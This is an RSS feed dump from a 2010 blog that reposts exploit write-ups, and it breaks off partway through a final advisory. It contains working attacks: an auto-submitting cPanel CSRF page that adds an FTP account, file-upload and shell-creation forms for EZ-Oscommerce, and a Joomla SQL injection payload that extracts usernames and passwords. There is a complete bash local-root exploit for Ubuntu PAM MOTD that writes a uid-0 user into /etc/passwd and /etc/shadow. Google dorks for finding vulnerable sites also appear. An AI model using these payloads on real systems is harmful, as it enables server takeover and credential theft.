<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>All about information from internet</title>
	<atom:link href="http://mild-info.com/feed" rel="self" type="application/rss+xml" />
	<link>http://mild-info.com</link>
	<description>You can get some information about internet from here</description>
	<pubDate>Wed, 21 Jul 2010 05:36:11 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<item>
		<title>Cpanel v11.25 CSRF Add FTP Account Exploit</title>
		<link>http://mild-info.com/2010/07/cpanel-v1125-csrf-add-ftp-account-exploit.php</link>
		<comments>http://mild-info.com/2010/07/cpanel-v1125-csrf-add-ftp-account-exploit.php#comments</comments>
		<pubDate>Wed, 21 Jul 2010 05:36:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1091</guid>
		<description><![CDATA[# Exploit Title: Cpanel 11.25 - [CSRF] Add FTP Account
# Author: G0D-F4Th3r
# Software Link: http://www.cpanel.net/
# Version: 11.25
#######################Exploit#######################################
&#60;html&#62;
&#60;body onload=&#8221;javascript:fireForms()&#8221;&#62;
&#60;form method=&#8221;POST&#8221; name=&#8221;form0&#8243; action=&#8221;
http://server:2082/frontend/x3/ftp/doaddftp.html&#8221;&#62;
&#60;input type=&#8221;hidden&#8221; name=&#8221;login&#8221; value=&#8221;name&#8221;/&#62;
&#60;input type=&#8221;hidden&#8221; name=&#8221;password&#8221; value=&#8221;pass&#8221;/&#62;
&#60;input type=&#8221;hidden&#8221; name=&#8221;password2&#8243; value=&#8221;pass&#8221;/&#62;
&#60;input type=&#8221;hidden&#8221; name=&#8221;homedir&#8221; value=&#8221;/&#8221;/&#62;
&#60;input type=&#8221;hidden&#8221; name=&#8221;quota&#8221; value=&#8221;unlimited&#8221;/&#62;
&#60;/form&#62;
&#60;/body&#62;
&#60;/html&#62;
###########################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
###########################################################################
]]></description>
			<content:encoded><![CDATA[<p># Exploit Title: Cpanel 11.25 - [CSRF] Add FTP Account<br />
# Author: G0D-F4Th3r<br />
# Software Link: http://www.cpanel.net/<br />
# Version: 11.25</p>
<p>#######################Exploit#######################################<br />
&lt;html&gt;<br />
&lt;body onload=&#8221;javascript:fireForms()&#8221;&gt;<br />
&lt;form method=&#8221;POST&#8221; name=&#8221;form0&#8243; action=&#8221;<br />
http://server:2082/frontend/x3/ftp/doaddftp.html&#8221;&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;login&#8221; value=&#8221;name&#8221;/&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;password&#8221; value=&#8221;pass&#8221;/&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;password2&#8243; value=&#8221;pass&#8221;/&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;homedir&#8221; value=&#8221;/&#8221;/&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;quota&#8221; value=&#8221;unlimited&#8221;/&gt;<br />
&lt;/form&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
###########################################################################<br />
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My<br />
Friends<br />
###########################################################################</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/07/cpanel-v1125-csrf-add-ftp-account-exploit.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>EZ-Oscommerce 3.1 Remote File Upload</title>
		<link>http://mild-info.com/2010/07/ez-oscommerce-31-remote-file-upload.php</link>
		<comments>http://mild-info.com/2010/07/ez-oscommerce-31-remote-file-upload.php#comments</comments>
		<pubDate>Wed, 21 Jul 2010 04:46:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1089</guid>
		<description><![CDATA[====================================================
EZ-Oscommerce 3.1 Remote File Upload
====================================================
########################################################################
# Vendor: http://www.ezosc.com
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home : www.arab-blackhat.co.cc
# Dork :Powered by osCommerce &#124; Customized by EZ-Oscommerce
# Bug  : Remote File Upload
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
&#60;html&#62;&#60;head&#62;&#60;title&#62; EZ-Oscommerce 3.1 - Remote File Upload &#60;/title&#62;&#60;/head&#62;
&#60;br&#62;&#60;br&#62;&#60;u&#62;UPLOAD FILE:&#60;/u&#62;&#60;br&#62;
&#60;form [...]]]></description>
			<content:encoded><![CDATA[<p>====================================================<br />
EZ-Oscommerce 3.1 Remote File Upload<br />
====================================================</p>
<p>########################################################################<br />
# Vendor: http://www.ezosc.com<br />
# Date: 2010-05-27<br />
# Author : indoushka<br />
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !<br />
# Contact : indoushka@hotmail.com<br />
# Home : www.arab-blackhat.co.cc<br />
# Dork :Powered by osCommerce | Customized by EZ-Oscommerce<br />
# Bug  : Remote File Upload<br />
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)<br />
########################################################################</p>
<p># Exploit By indoushka</p>
<p>&lt;html&gt;&lt;head&gt;&lt;title&gt; EZ-Oscommerce 3.1 - Remote File Upload &lt;/title&gt;&lt;/head&gt;</p>
<p>&lt;br&gt;&lt;br&gt;&lt;u&gt;UPLOAD FILE:&lt;/u&gt;&lt;br&gt;</p>
<p>&lt;form name=&#8221;file&#8221; action=&#8221;http://site/admin/file_manager.php/login.php?action=processuploads&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart/form-data&#8221;&gt;</p>
<p>&lt;input type=&#8221;file&#8221; name=&#8221;file_1&#8243;&gt;&lt;br&gt;</p>
<p>&lt;input name=&#8221;submit&#8221; type=&#8221;submit&#8221; value=&#8221;   Upload   &#8221; &gt;</p>
<p>&lt;/form&gt;</p>
<p>&lt;br&gt;&lt;u&gt;CREATE FILE:&lt;/u&gt;&lt;br&gt;</p>
<p>&lt;form name=&#8221;new_file&#8221; action=&#8221;http://site/admin/file_manager.php/login.php?action=save&#8221; method=&#8221;post&#8221;&gt;</p>
<p>FILE NAME:&lt;br&gt;</p>
<p>&lt;input type=&#8221;text&#8221; name=&#8221;filename&#8221;&gt;  (ex. shell.php)&lt;br&gt;FILE CONTENTS:&lt;br&gt;</p>
<p>&lt;textarea name=&#8221;file_contents&#8221; wrap=&#8221;soft&#8221; cols=&#8221;70&#8243; rows=&#8221;10&#8243;&gt;&lt;/textarea&gt;</p>
<p>&lt;input name=&#8221;submit&#8221; type=&#8221;submit&#8221; value=&#8221;   Save   &#8221; &gt;</p>
<p>&lt;/form&gt;</p>
<p>Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================<br />
all my friend :<br />
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N<br />
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/07/ez-oscommerce-31-remote-file-upload.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability</title>
		<link>http://mild-info.com/2010/07/mayasan-portal-v20-haberdetayasp-sql-injection-vulnerability.php</link>
		<comments>http://mild-info.com/2010/07/mayasan-portal-v20-haberdetayasp-sql-injection-vulnerability.php#comments</comments>
		<pubDate>Wed, 21 Jul 2010 04:45:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1087</guid>
		<description><![CDATA[########################################################
Mayasan Portal v2.0 (haberdetay.asp?id) SQL Injection Vulnerability
########################################################
Author : CoBRa_21
Author Web Page : http://www.ipbul.org
Download Page : http://scripti.org/indir.php?id=632
########################################################
Sql Injection:
http://localhost/[path]/haberdetay.asp?id=29 (Sql)
########################################################
]]></description>
			<content:encoded><![CDATA[<p>########################################################</p>
<p>Mayasan Portal v2.0 (haberdetay.asp?id) SQL Injection Vulnerability</p>
<p>########################################################</p>
<p>Author : CoBRa_21</p>
<p>Author Web Page : http://www.ipbul.org</p>
<p>Download Page : http://scripti.org/indir.php?id=632</p>
<p>########################################################</p>
<p>Sql Injection:</p>
<p>http://localhost/[path]/haberdetay.asp?id=29 (Sql)</p>
<p>########################################################</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/07/mayasan-portal-v20-haberdetayasp-sql-injection-vulnerability.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Joomla Component com_spa SQL Injection Vulnerability</title>
		<link>http://mild-info.com/2010/07/joomla-component-com_spa-sql-injection-vulnerability.php</link>
		<comments>http://mild-info.com/2010/07/joomla-component-com_spa-sql-injection-vulnerability.php#comments</comments>
		<pubDate>Wed, 21 Jul 2010 04:44:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1085</guid>
		<description><![CDATA[====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================
Author :   altbta
Email  : [l_9[at]hotmail[dot]com]
Homepage : { www.xp10.com/xp10 }
DORK    :  inurl:&#8221;index.php?option=com_spa&#8221;
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&#38;view=spa_read_more&#38;pid=[SQL]
[+] ExploiT :
-35 UNION SELECT 1,2,3,4,concat(username,0&#215;3a,password),6,7,8,9,10,11,12,13
from jos_users&#8211;
[+] Example :
http://www.site.com/index.php?option=com_spa&#38;view=spa_read_more&#38;pid=-35UNION
SELECT 1,2,3,4,concat(username,0&#215;3a,password),6,7,8,9,10,11,12,13 from
jos_users&#8211;
[+] Demo :
http://www.site.com/index.php?option=com_spa&#38;view=spa_read_more&#38;pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0&#215;3a,password),6,7,8,9,10,11,12,13%20from%20jos_users&#8211;
]]></description>
			<content:encoded><![CDATA[<p>====================================================<br />
Joomla Component com_spa SQL Injection Vulnerability<br />
====================================================</p>
<p>Author :   altbta<br />
Email  : [l_9[at]hotmail[dot]com]<br />
Homepage : { www.xp10.com/xp10 }<br />
DORK    :  inurl:&#8221;index.php?option=com_spa&#8221;<br />
===================================================</p>
<p>[+] Vulnerable File :<br />
http://www.site.com/index.php?option=com_spa&amp;view=spa_read_more&amp;pid=[SQL]</p>
<p>[+] ExploiT :<br />
-35 UNION SELECT 1,2,3,4,concat(username,0&#215;3a,password),6,7,8,9,10,11,12,13<br />
from jos_users&#8211;</p>
<p>[+] Example :<br />
http://www.site.com/index.php?option=com_spa&amp;view=spa_read_more&amp;pid=-35UNION<br />
SELECT 1,2,3,4,concat(username,0&#215;3a,password),6,7,8,9,10,11,12,13 from<br />
jos_users&#8211;</p>
<p>[+] Demo :<br />
http://www.site.com/index.php?option=com_spa&amp;view=spa_read_more&amp;pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0&#215;3a,password),6,7,8,9,10,11,12,13%20from%20jos_users&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/07/joomla-component-com_spa-sql-injection-vulnerability.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Ubuntu PAM MOTD Local Root Exploit</title>
		<link>http://mild-info.com/2010/07/ubuntu-pam-motd-local-root-exploit.php</link>
		<comments>http://mild-info.com/2010/07/ubuntu-pam-motd-local-root-exploit.php#comments</comments>
		<pubDate>Wed, 21 Jul 2010 04:43:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1083</guid>
		<description><![CDATA[#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user [...]]]></description>
			<content:encoded><![CDATA[<p>#!/bin/bash<br />
#<br />
# Exploit Title: Ubuntu PAM MOTD local root<br />
# Date: July 9, 2010<br />
# Author: Anonymous<br />
# Software Link: http://packages.ubuntu.com/<br />
# Version: pam-1.1.0<br />
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)<br />
# CVE: CVE-2010-0832<br />
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i<br />
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen<br />
#<br />
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd &amp; /etc/shadow.<br />
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.<br />
#<br />
#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh<br />
#   [*] Ubuntu PAM MOTD local root<br />
#   [*] Backuped /home/user/.ssh/authorized_keys<br />
#   [*] SSH key set up<br />
#   [*] Backuped /home/user/.cache<br />
#   [*] spawn ssh<br />
#   [+] owned: /etc/passwd<br />
#   [*] spawn ssh<br />
#   [+] owned: /etc/shadow<br />
#   [*] Restored /home/user/.cache<br />
#   [*] Restored /home/user/.ssh/authorized_keys<br />
#   [*] SSH key removed<br />
#   [+] Success! Use password toor to get root<br />
#   Password:<br />
#   root@ubuntu:/home/user# id<br />
#   uid=0(root) gid=0(root) groupes=0(root)<br />
#<br />
P=&#8217;toor:x:0:0:root:/root:/bin/bash&#8217;<br />
S=&#8217;toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::&#8217;<br />
echo &#8220;[*] Ubuntu PAM MOTD local root&#8221;<br />
[ -z "$(which ssh)" ] &amp;&amp; echo &#8220;[-] ssh is a requirement&#8221; &amp;&amp; exit 1<br />
[ -z "$(which ssh-keygen)" ] &amp;&amp; echo &#8220;[-] ssh-keygen is a requirement&#8221; &amp;&amp; exit 1<br />
[ -z "$(ps -u root |grep sshd)" ] &amp;&amp; echo &#8220;[-] a running sshd is a requirement&#8221; &amp;&amp; exit 1<br />
backup() {<br />
[ -e "$1" ] &amp;&amp; [ -e "$1".bak ] &amp;&amp; rm -rf &#8220;$1&#8243;.bak<br />
[ -e "$1" ] || return 0<br />
mv &#8220;$1&#8243;{,.bak} || return 1<br />
echo &#8220;[*] Backuped $1&#8243;<br />
}<br />
restore() {<br />
[ -e "$1" ] &amp;&amp; rm -rf &#8220;$1&#8243;<br />
[ -e "$1".bak ] || return 0<br />
mv &#8220;$1&#8243;{.bak,} || return 1<br />
echo &#8220;[*] Restored $1&#8243;<br />
}<br />
key_create() {<br />
backup ~/.ssh/authorized_keys<br />
ssh-keygen -q -t rsa -N &#8221; -C &#8216;pam&#8217; -f &#8220;$KEY&#8221; || return 1<br />
[ ! -d ~/.ssh ] &amp;&amp; { mkdir ~/.ssh || return 1; }<br />
mv &#8220;$KEY.pub&#8221; ~/.ssh/authorized_keys || return 1<br />
echo &#8220;[*] SSH key set up&#8221;<br />
}<br />
key_remove() {<br />
rm -f &#8220;$KEY&#8221;<br />
restore ~/.ssh/authorized_keys<br />
echo &#8220;[*] SSH key removed&#8221;<br />
}<br />
own() {<br />
[ -e ~/.cache ] &amp;&amp; rm -rf ~/.cache<br />
ln -s &#8220;$1&#8243; ~/.cache || return 1<br />
echo &#8220;[*] spawn ssh&#8221;<br />
ssh -o &#8216;NoHostAuthenticationForLocalhost yes&#8217; -i &#8220;$KEY&#8221; localhost true<br />
[ -w "$1" ] || { echo &#8220;[-] Own $1 failed&#8221;; restore ~/.cache; bye; }<br />
echo &#8220;[+] owned: $1&#8243;<br />
}<br />
bye() {<br />
key_remove<br />
exit 1<br />
}<br />
KEY=&#8221;$(mktemp -u)&#8221;<br />
key_create || { echo &#8220;[-] Failed to setup SSH key&#8221;; exit 1; }<br />
backup ~/.cache || { echo &#8220;[-] Failed to backup ~/.cache&#8221;; bye; }<br />
own /etc/passwd &amp;&amp; echo &#8220;$P&#8221; &gt;&gt; /etc/passwd<br />
own /etc/shadow &amp;&amp; echo &#8220;$S&#8221; &gt;&gt; /etc/shadow<br />
restore ~/.cache || { echo &#8220;[-] Failed to restore ~/.cache&#8221;; bye; }<br />
key_remove<br />
echo &#8220;[+] Success! Use password toor to get root&#8221;<br />
su -c &#8220;sed -i &#8216;/toor:/d&#8217; /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \<br />
chgrp shadow /etc/shadow; nscd -i passwd &gt;/dev/null 2&gt;&amp;1; bash&#8221; toor</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/07/ubuntu-pam-motd-local-root-exploit.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability</title>
		<link>http://mild-info.com/2010/07/php-chat-for-123-flash-chat-remote-file-inclusion-vulnerability.php</link>
		<comments>http://mild-info.com/2010/07/php-chat-for-123-flash-chat-remote-file-inclusion-vulnerability.php#comments</comments>
		<pubDate>Wed, 21 Jul 2010 04:42:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1081</guid>
		<description><![CDATA[*# Exploit Title:   php_chat Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: HaCkEr arar
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home:
http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html
# Tested on: Windows
# Team hacker:HaCkEr aRaR &#38; ViRuS Qalaa &#62;&#62;&#62;X-MaN HaCk3r TeaM
# ViRuS Qalaa: em9@live.com
:::::::::::::::::::::::::
=================Exploit=================
-=[ vuln c0de ]=-
include(&#8217;db/&#8217;.$select_db.&#8217;.php&#8217;);
login_chat.php
Line:41
&#8212;-exploit&#8212;-
http://{localhost}/{path}login_chat.php?select_db=shell.txt?
&#8212;&#8212;&#8212;greatz&#8212;&#8212;&#8212;-
Greatz to :
ViRuS Qalaa,VoLc4n0,Members www.j1q1.com
and My friends Others and My friends in MSN
EnJoY o_O*
]]></description>
			<content:encoded><![CDATA[<p>*# Exploit Title:   php_chat Remote File inclusion Vulnerability<br />
# Date: 2010/07/20<br />
# Author: HaCkEr arar<br />
# Email: y.0@hotmail.de<br />
# My Sites : www.vbspiders.com<br />
# Script home:<br />
http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html<br />
# Tested on: Windows<br />
# Team hacker:HaCkEr aRaR &amp; ViRuS Qalaa &gt;&gt;&gt;X-MaN HaCk3r TeaM<br />
# ViRuS Qalaa: em9@live.com<br />
:::::::::::::::::::::::::<br />
=================Exploit=================</p>
<p>-=[ vuln c0de ]=-<br />
include(&#8217;db/&#8217;.$select_db.&#8217;.php&#8217;);<br />
login_chat.php<br />
Line:41</p>
<p>&#8212;-exploit&#8212;-</p>
<p>http://{localhost}/{path}login_chat.php?select_db=shell.txt?</p>
<p>&#8212;&#8212;&#8212;greatz&#8212;&#8212;&#8212;-<br />
Greatz to :<br />
ViRuS Qalaa,VoLc4n0,Members www.j1q1.com</p>
<p>and My friends Others and My friends in MSN<br />
EnJoY o_O*</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/07/php-chat-for-123-flash-chat-remote-file-inclusion-vulnerability.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Joomla Component JE Section Finder LFI Vulnerability</title>
		<link>http://mild-info.com/2010/06/joomla-component-je-section-finder-lfi-vulnerability.php</link>
		<comments>http://mild-info.com/2010/06/joomla-component-je-section-finder-lfi-vulnerability.php#comments</comments>
		<pubDate>Sun, 27 Jun 2010 03:17:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1079</guid>
		<description><![CDATA[Name : Joomla jesectionfinder LFI Vulnerability
Date : june, 26 2010
Critical Level     : HIGH
Vendor Url : http://joomlaextensions.co.in/component/awd_song/
Google Dork: inurl:/component/jesectionfinder/
Price:$25.00
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends  luv y0 guyz
############################################################
Description:
This component for web-based business that specialises in buying and selling sections [...]]]></description>
			<content:encoded><![CDATA[<p>Name : Joomla jesectionfinder LFI Vulnerability<br />
Date : june, 26 2010<br />
Critical Level     : HIGH<br />
Vendor Url : http://joomlaextensions.co.in/component/awd_song/<br />
Google Dork: inurl:/component/jesectionfinder/<br />
Price:$25.00<br />
Author : Sid3^effects aKa HaRi<br />
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_<br />
greetz to :www.topsecure.net ,All ICW members and my friends <img src='http://mild-info.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> luv y0 guyz<br />
############################################################<br />
Description:<br />
This component for web-based business that specialises in buying and selling sections nationwide. Our aim is easy to connect the seller of</p>
<p>land directly to the buyer, its simple.</p>
<p>Easy to handle that component functionallity.</p>
<p>User can add your section/property into particular listing option. Listing option manages from the backend. User selects his plan (Listing</p>
<p>option) and enters property detail (with images).  After use see that preview and make it payment.  If user makes it payment successfully</p>
<p>than it display automating otherwise his listing not published.<br />
User searches property and contact seller for more detail.</p>
<p>###########################################################</p>
<p>DEMO URL : http://server/propertyfinder/component/jesectionfinder/?view=[LFI]</p>
<p>###########################################################</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/06/joomla-component-je-section-finder-lfi-vulnerability.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Joomla Component JE Story Submit SQL Injection Vulnerability</title>
		<link>http://mild-info.com/2010/06/joomla-component-je-story-submit-sql-injection-vulnerability.php</link>
		<comments>http://mild-info.com/2010/06/joomla-component-je-story-submit-sql-injection-vulnerability.php#comments</comments>
		<pubDate>Sun, 27 Jun 2010 03:17:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1077</guid>
		<description><![CDATA[Exploit Title: Joomla JE Story submit SQL Injection
Vendor url:http://joomlaextensions.co.in
Version:1.4
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat, Sai, KD, M4n0j.
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW members.
Description:
100% MVC structure follow. User can add your stories in joomla article.
Front end:
User can add stories. Admin and users get mail after user adds the story. Admin approve [...]]]></description>
			<content:encoded><![CDATA[<p>Exploit Title: Joomla JE Story submit SQL Injection<br />
Vendor url:http://joomlaextensions.co.in<br />
Version:1.4<br />
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat, Sai, KD, M4n0j.<br />
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com<br />
Shoutzz:- To all ICW members.</p>
<p>Description:<br />
100% MVC structure follow. User can add your stories in joomla article.</p>
<p>Front end:</p>
<p>User can add stories. Admin and users get mail after user adds the story. Admin approve than show up in front-end. CAPTCHA code feature is available in front end side. User can upload images.</p>
<p>Back end:</p>
<p>Admin can configure the section, category and email address.<br />
For Joomla Version: Joomla 1.5. Login here for free download.<br />
Also admin can select the category and section what ever they want. Select section functionality using Ajax.<br />
Admin email format also user email format setting from back-end. Easy to make or change email format using wysing editor.<br />
Admin can disable and enable the category/section selection option.</p>
<p>Support the Joomla 1.5.</p>
<p>Features:-<br />
- Admin can configure the section, category and email address.<br />
- Easy to make or change email format using wysing editor in the back end.<br />
- User can add story. Admin and users get mail after user adds the story.<br />
- Putting the CAPTCHA code for security.<br />
- User can upload images from front end.<br />
- Admin approve than show up in front-end.</p>
<p>Vulnerability:</p>
<p>*SQLi Vulnerability</p>
<p>DEMO URL :</p>
<p>http://www.example.com/component/jesubmit/?view=[sqli]</p>
<p># 0day n0 m0re #<br />
# L0rd CrusAd3r #</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/06/joomla-component-je-story-submit-sql-injection-vulnerability.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Speedy v1.0 Remote Shell Upload Vulnerability</title>
		<link>http://mild-info.com/2010/06/speedy-v10-remote-shell-upload-vulnerability.php</link>
		<comments>http://mild-info.com/2010/06/speedy-v10-remote-shell-upload-vulnerability.php#comments</comments>
		<pubDate>Sun, 27 Jun 2010 03:15:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1075</guid>
		<description><![CDATA[# Author: ViRuS Qalaa
# Email: h1g@hotmail.it
# My Sites : www.pal-mafia.com &#38; www.vbspiders.com
# Script home: http://www.speedy-up.com/
# Tested on: Windows
# Team hacker:ViRuS Qalaa &#38; HaCkEr aRaR &#38; ViRuS KSA&#62;&#62;&#62;X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
DorK:No DorK In MY Exploit
First Upload your shell.php.gif on The Script Speedy 1,0
&#8212;-exploit&#8212;-
I will show you the direct download link list in your browser and enjoy Blcl
your [...]]]></description>
			<content:encoded><![CDATA[<p># Author: ViRuS Qalaa<br />
# Email: h1g@hotmail.it<br />
# My Sites : www.pal-mafia.com &amp; www.vbspiders.com<br />
# Script home: http://www.speedy-up.com/<br />
# Tested on: Windows<br />
# Team hacker:ViRuS Qalaa &amp; HaCkEr aRaR &amp; ViRuS KSA&gt;&gt;&gt;X-MaN HaCk3r TeaM<br />
:::::::::::::::::::::::::<br />
=================Exploit=================<br />
DorK:No DorK In MY Exploit</p>
<p>First Upload your shell.php.gif on The Script Speedy 1,0</p>
<p>&#8212;-exploit&#8212;-<br />
I will show you the direct download link list in your browser and enjoy Blcl</p>
<p>your link shell licke<br />
http://{localhost}/{path}/uploads/Speedy_7296144526.gif</p>
<p>&#8212;&#8212;&#8212;greatz&#8212;&#8212;&#8212;-<br />
Greatz to :<br />
hacker arar,ViRuS KSA,Q2,MR.WwW,MR.Romio hacker,black.jaguar</p>
<p>and My friends Others and My friends in MSN<br />
EnJoY o_O</p>
]]></content:encoded>
			<wfw:commentRss>http://mild-info.com/2010/06/speedy-v10-remote-shell-upload-vulnerability.php/feed</wfw:commentRss>
		</item>
		<item>
		<title>Local Privilege Escalation in InterScan Web Security Virtual</title>
		<link>http://mild-info.com/2010/06/local-privilege-escalation-in-interscan-web-security-virtual.php</link>
		<comments>http://mild-info.com/2010/06/local-privilege-escalation-in-interscan-web-security-virtual.php#comments</comments>
		<pubDate>Sat, 26 Jun 2010 00:22:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://mild-info.com/?p=1073</guid>
		<description><![CDATA[Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual
Apliance 5.0
Internal Cybsec Advisory Id: 2010-0604
Vulnerability Class: Local Privilege Escalation
Release Date: 22-06-2010
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected
Affected Platforms: Red Hat nash 5.1
Local / Remote: Local
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Ivan Huertas
Vendor Status: Patched
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
Vulnerability [...]]]></description>
			<content:encoded><![CDATA[<p>Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual<br />
Apliance 5.0<br />
Internal Cybsec Advisory Id: 2010-0604<br />
Vulnerability Class: Local Privilege Escalation<br />
Release Date: 22-06-2010<br />
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected<br />
Affected Platforms: Red Hat nash 5.1<br />
Local / Remote: Local<br />
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)<br />
Researcher: Ivan Huertas<br />
Vendor Status: Patched<br />
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf</p>
<p>Vulnerability Description:<br />
